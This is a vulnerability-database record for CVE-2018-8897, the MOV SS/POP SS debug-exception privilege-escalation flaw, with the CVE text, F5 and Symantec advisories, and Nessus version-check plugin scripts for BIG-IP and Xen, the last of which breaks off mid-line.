ID CVE-2018-8897 Type cve Reporter cve@mitre.org Modified 2019-10-03T00:03:00
Description
A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs.
{"f5": [{"lastseen": "2020-04-06T22:39:41", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "\nF5 Product Development has assigned ID 719554 (BIG-IP), ID 719747 (BIG-IQ and F5 iWorkflow), and ID 719744 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17403481 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.0.3 | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.3 | 12.1.3.7 \n11.x | 11.6.0 - 11.6.3 \n11.2.1 - 11.5.8 | 11.6.3.3 \n11.5.9 \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-12T19:44:00", "published": "2018-05-15T07:59:00", "id": "F5:K17403481", "href": "https://support.f5.com/csp/article/K17403481", "title": "Linux kernel vulnerability CVE-2018-8897", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-05-08T23:57:19", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 1, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "SMNTC-104071", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104071", "title": "Microsoft Windows Kernel CVE-2018-8897 Local Privilege Escalation Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2020-09-14T13:54:27", "description": "A statement in the System Programming Guide of the Intel 64 and IA-32\nArchitectures Software Developer's Manual (SDM) was mishandled in the\ndevelopment of some or all operating-system kernels, resulting in\nunexpected behavior for #DB exceptions that are deferred by MOV SS or\nPOP SS, as demonstrated by (for example) privilege escalation in\nWindows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel\ncrash. The MOV to SS and POP SS instructions inhibit interrupts\n(including NMIs), data breakpoints, and single step trap exceptions\nuntil the instruction boundary following the next instruction (SDM\nVol. 3A; section 6.8.3). (The inhibited data breakpoints are those on\nmemory accessed by the MOV to SS or POP to SS instruction itself.)\nNote that debug exceptions are not inhibited by the interrupt enable\n(EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction\nfollowing the MOV to SS or POP to SS instruction is an instruction\nlike SYSCALL, SYSENTER, INT 3, etc. that transfers control to the\noperating system at CPL < 3, the debug exception is delivered after\nthe transfer to CPL < 3 is complete. OS kernels may not expect this\norder of events and may therefore experience unexpected behavior when\nit occurs. (CVE-2018-8897)\n\nImpact\n\nThis vulnerability allows for a disruption of service.", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-02T00:00:00", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K17403481)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2018-11-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL17403481.NASL", "href": "https://www.tenable.com/plugins/nessus/118635", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K17403481.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118635);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/09\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (K17403481)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A statement in the System Programming Guide of the Intel 64 and IA-32\nArchitectures Software Developer's Manual (SDM) was mishandled in the\ndevelopment of some or all operating-system kernels, resulting in\nunexpected behavior for #DB exceptions that are deferred by MOV SS or\nPOP SS, as demonstrated by (for example) privilege escalation in\nWindows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel\ncrash. The MOV to SS and POP SS instructions inhibit interrupts\n(including NMIs), data breakpoints, and single step trap exceptions\nuntil the instruction boundary following the next instruction (SDM\nVol. 3A; section 6.8.3). (The inhibited data breakpoints are those on\nmemory accessed by the MOV to SS or POP to SS instruction itself.)\nNote that debug exceptions are not inhibited by the interrupt enable\n(EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction\nfollowing the MOV to SS or POP to SS instruction is an instruction\nlike SYSCALL, SYSENTER, INT 3, etc. that transfers control to the\noperating system at CPL < 3, the debug exception is delivered after\nthe transfer to CPL < 3 is complete. OS kernels may not expect this\norder of events and may therefore experience unexpected behavior when\nit occurs. (CVE-2018-8897)\n\nImpact\n\nThis vulnerability allows for a disruption of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17403481\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K17403481.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K17403481\";\nvmatrix = make_array();\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"14.0.0\",\"13.0.0-13.1.1\",\"12.1.0-12.1.3\",\"11.6.0-11.6.3\",\"11.2.1-11.5.8\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"14.1.0\",\"14.0.0.3\",\"13.1.1.2\",\"12.1.3.7\",\"11.6.3.3\",\"11.5.9\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T06:23:17", "description": "According to its self-reported version number, the Xen hypervisor\ninstalled on the remote host is affected by a local privilege \nescalation vulnerability.\n\nNote that Nessus has checked the changeset versions based on the\nxen.git change log. Nessus did not check guest hardware configurations\nor if patches were applied manually to the source code before a\nrecompile and reinstall.", "edition": 23, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-11T00:00:00", "title": "Xen Intel Architecture Debug Exception Handling Local Privilege Escalation (XSA-260)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:xen:xen"], "id": "XEN_SERVER_XSA-260.NASL", "href": "https://www.tenable.com/plugins/nessus/109727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109727);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-8897\");\n script_bugtraq_id(104071);\n\n script_name(english:\"Xen Intel Architecture Debug Exception Handling Local Privilege Escalation (XSA-260)\");\n script_summary(english:\"Checks 'xl info' output for the Xen hypervisor version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Xen hypervisor installation is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Xen hypervisor\ninstalled on the remote host is affected by a local privilege \nescalation vulnerability.\n\nNote that Nessus has checked the changeset versions based on the\nxen.git change log. Nessus did not check guest hardware configurations\nor if patches were applied manually to the source code before a\nrecompile and reinstall.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://xenbits.xen.org/xsa/advisory-260.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://xenbits.xen.org/gitweb/?p=xen.git;a=summary\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:xen:xen\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xen_server_detect.nbin\");\n script_require_keys(\"installed_sw/Xen Hypervisor\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Xen Hypervisor\";\ninstall = get_single_install(app_name:app_name);\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ndisplay_version = install['display_version'];\npath = install['path'];\nmanaged_status = install['Managed status'];\nchangeset = install['Changeset'];\n\nif (!empty_or_null(changeset))\n display_version += \" (changeset \" + changeset + \")\";\n\n# Installations that are vendor-managed are handled by OS-specific local package checks\nif (managed_status == \"managed\")\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, display_version, path);\n\nfixes['4.6']['fixed_ver'] = '4.6.6';\nfixes['4.6']['fixed_ver_display'] = '4.6.6 (changeset 3b96676)';\nfixes['4.6']['affected_ver_regex'] = '^4\\\\.6\\\\.';\nfixes['4.6']['affected_changesets'] = make_list(\"2f3cde3\", \"acd8661\",\n \"5ddc3f8\", \"927aca7\", \"b4b553d\", \"b766574\", \"10898d7\", \"0b38930\",\n \"33f70b8\", \"cf03d32\", \"525c381\", \"4c1e2d3\", \"021009e\", \"4972c38\",\n \"bd461fc\", \"c9c1bb6\", \"0fbf30a\", \"7e20b9b\", \"d1618f4\", \"9d534c1\",\n \"dbb3553\", \"e54a8c6\", \"8005ed3\", \"9a852e0\", \"d779cc1\", \"c93bcf9\",\n \"15adcf3\", \"d7b8190\", \"2b1457f\", \"a357880\", \"ee23fcc\", \"5651015\",\n \"225e9c7\", \"3c70619\", \"1222333\", \"75bdd69\", \"8994cf3\", \"642c603\",\n \"c25ea9a\", \"feba571\", \"0163087\", \"44c2666\", \"db743b0\", \"41a5cce\",\n \"4e1b9e9\", \"4d21549\", \"ff4800c\", \"2613a1b\", \"8335c8a\", \"ab20c5c\",\n \"9089da9\", \"8edfc82\", \"af5b61a\", \"ec05090\", \"75263f7\", \"f7e273a\",\n \"03c7d2c\", \"9ce1a71\", \"a735c7a\", \"44ad7f6\", \"91dc902\", \"a065841\",\n \"c6e9e60\", \"f94c11d\", \"45ddc4e\", \"1ca93b7\", \"8c0c36e\", \"6e43623\",\n \"47d3e73\", \"ea80245\", \"37bb22b\", \"9b0c2a2\", \"8d3fe28\", \"be63d66\",\n \"9454e30\", \"aad5a67\", \"d8b0ebf\", \"f0208a4\", \"42b2c82\", \"57318e1\",\n \"9f22d72\", \"e0353b4\", \"76f1549\", \"9bac910\", \"c7a43e3\", \"913d4f8\",\n \"c5881c5\", \"b0239cd\", \"78fd0c3\", \"9079e0d\", \"1658a87\", \"22b6dfa\",\n \"a8cd231\", \"629eddd\", \"64c03bb\", \"b4660b4\", \"1ac8162\", \"747df3c\",\n \"5ae011e\", \"f974d32\", \"3300ad3\", \"d708b69\");\n\nfixes['4.7']['fixed_ver'] = '4.7.5';\nfixes['4.7']['fixed_ver_display'] = '4.7.5 (changeset a6a2b5a)';\nfixes['4.7']['affected_ver_regex'] = '^4\\\\.7\\\\.';\nfixes['4.7']['affected_changesets'] = make_list(\"54ff338\", \"1bd5a36\",\n \"5fc0102\", \"a8ef075\", \"e613050\", \"2fbc006\", \"1619cff\", \"5c81317\",\n \"912aa9b\", \"63b140f\", \"62b1879\", \"9680710\", \"dca80ab\");\n\nfixes['4.8']['fixed_ver'] = '4.8.4';\nfixes['4.8']['fixed_ver_display'] = '4.8.4-pre (changeset 3f59d0b)';\nfixes['4.8']['affected_ver_regex'] = '^4\\\\.8\\\\.';\nfixes['4.8']['affected_changesets'] = make_list(\"a89390b\", \"40c4ab8\",\n \"90676b7\", \"1052a21\", \"a2f02df\", \"501718a\", \"957ff30\", \"1e9ac23\",\n \"95befc6\", \"372583c\", \"202aaf8\", \"e4e9632\", \"a753be1\", \"8f9846f\",\n \"0864795\", \"866deda\", \"c67e19f\", \"bc6414f\", \"883c8db\", \"7db1c43\",\n \"813fe21\", \"3cadc8b\", \"f7bf4d2\", \"14217cb\", \"ce185fb\", \"a2700ca\",\n \"b19b206\", \"a442d40\", \"1901f62\", \"1581910\", \"15f57b8\", \"7ef31c0\",\n \"bc8aa42\", \"30a153d\", \"da92664\", \"6b08396\", \"f6ae9c0\", \"ad9ddc3\",\n \"22d2146\", \"f9adc12\", \"e27fd5c\", \"03f9474\", \"c31070f\", \"1093876\",\n \"141be84\", \"bb49733\", \"48faa50\", \"5938aa1\", \"d11783c\", \"8e1e3c7\",\n \"99ed786\", \"76bdfe8\", \"fee4689\", \"c0bfde6\", \"64c1742\", \"8615385\",\n \"e09a5c2\", \"ff570a3\", \"e6bcb41\", \"29e7171\", \"c3d195c\", \"2cd189e\",\n \"afdad6a\", \"532ccf4\", \"da49e51\", \"ca9583d\", \"479b879\", \"2eefd92\",\n \"60c50f2\", \"1838e21\", \"5732a8e\", \"987b08d\", \"eadcd83\", \"ef2464c\",\n \"17bfbc8\", \"499391b\", \"87cb0e2\", \"393de92\");\n\nfixes['4.9']['fixed_ver'] = '4.9.3';\nfixes['4.9']['fixed_ver_display'] = '4.9.3-pre (changeset b9b5a03)';\nfixes['4.9']['affected_ver_regex'] = '^4\\\\.9\\\\.';\nfixes['4.9']['affected_changesets'] = make_list(\"35a71c6\", \"b844573\",\n \"48dd543\", \"7866e11\", \"db7accf\", \"921bff4\", \"c147505\", \"dc527ff\",\n \"781e23a\", \"72ca580\", \"47d41f6\", \"7a59015\", \"259bee9\", \"6d4c4f0\", \"3e010f5\");\n\nfixes['4.10']['fixed_ver'] = '4.10.1';\nfixes['4.10']['fixed_ver_display'] = '4.10.1 (changeset 07b6f42)';\nfixes['4.10']['affected_ver_regex'] = '^4\\\\.10\\\\.';\nfixes['4.10']['affected_changesets'] = make_list(\"373d496\", \"9abae6f\",\n \"abe5fb9\", \"99e5000\");\n\nfix = NULL;\nforeach ver_branch (keys(fixes))\n{\n if (version =~ fixes[ver_branch]['affected_ver_regex'])\n {\n ret = ver_compare(ver:version, fix:fixes[ver_branch]['fixed_ver']);\n if (ret < 0)\n fix = fixes[ver_branch]['fixed_ver_display'];\n else if (ret == 0)\n {\n if (empty_or_null(changeset))\n fix = fixes[ver_branch]['fixed_ver_display'];\n else\n foreach affected_changeset (fixes[ver_branch]['affected_changesets'])\n if (changeset == affected_changeset)\n fix = fixes[ver_branch]['fixed_ver_display'];\n }\n }\n}\n\nif (empty_or_null(fix))\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, display_version, path);\n\nitems = make_array(\n \"Installed version\", display_version,\n \"Fixed version\", fix,\n \"Path\", path\n);\n\norder = make_list(\"Path\", \"Installed version\", \"Fixed version\");\nreport = report_items_str(report_items:items, ordered_fields:order) + 